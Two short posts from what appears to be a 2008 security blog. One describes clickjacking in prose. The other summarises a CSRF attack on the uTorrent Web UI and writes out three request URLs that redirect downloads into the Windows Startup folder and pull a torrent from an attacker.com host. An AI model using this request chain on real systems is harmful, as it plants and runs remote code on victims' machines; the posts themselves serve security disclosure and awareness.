Clickjacking revealed
October 27, 2008 by lamer · Leave a Comment
I just came back from the first day of OWASP AppSec Asia 2008 in Taipei. Beside two t-shirts, I got to be among the first privilege group to preview Robert Hansen’s presentation on Clickjacking. The show is scheduled for the second day, tomorrow, but I have to fly to Kuala Lumpur. How lucky am I!
Getting back to the issue, clickjacking basically borrows the user’s mouse click to click on another unintended object such as a link, or a button. For example, the website shows you a link, you click on it thinking that you will be taken to the intended location. But hey, the browser sends a request to another location!
But that’s doable with plain JavaScript too. What’s new here is the click you made could be placed on a button of an ActiveX. Scary, no? The demo showed me that, with clickjacking, bad guys could force Flash player to turn on the microphone. When you visit a HTML page, some JavaScript activates a Flash component. This component asks the Flash player to turn on the microphone and starts recording. Normally, Flash player will pop up a dialog with an OK button to ask for your permission before doing so. Now, your mouse click, that you made on the HTML page, is borrowed and used to click on that OK button. And Flash player turns on the microphone. Or maybe the webcam. Or, wait, maybe something more than that. Whatever you can do with a mouse click, clickjacking allows the attacker to “help” you do that, silently.
Thank you Robert for the preview. It was way cool!
For the HITB 2008 KL goers, Jeremiah Grossman will be presenting the keynote “The art of Click Jacking” on the first day. And I will see you there too.
Own a box via CSRF
May 7, 2008 by RD · Leave a Comment
Rob Carter has posted a blog on how to pwn a box via a pure CSRF bug of a uTorrent plugin. When a user installs the uTorrent Web UI plugin, the plugin starts a locally running web server on your machine. Basically, his CSRF exploit force uTorrent to move completed downloads to an arbitrary directory on their system, download arbitrary torrents, and completely own their box.
- The first CSRF to turn on the “Move completed downloads” option on the uTorrent Web UI. http://localhost:14774/gui/?action=setsetting&s=dir_completed_download_flag&v=1
- The second CSRF to change the path of where the completed torrent download is placed. For example:
http://localhost:14774/gui/?action=setsetting&s=dir_completed_download&v=C:\
Documents%20and%20Settings\All%20Users\Start%20Menu\Programs\Startup
- The last CSRF is to force the victim to download a torrent which points to an attacker controlled file. Once the file is downloaded via torrent, uTorrent places the files into startup folder and automatically run the file in the next windows boot.
http://localhost:14774/gui/?action=add-url&s=http://www.attacker.com/file.torrent
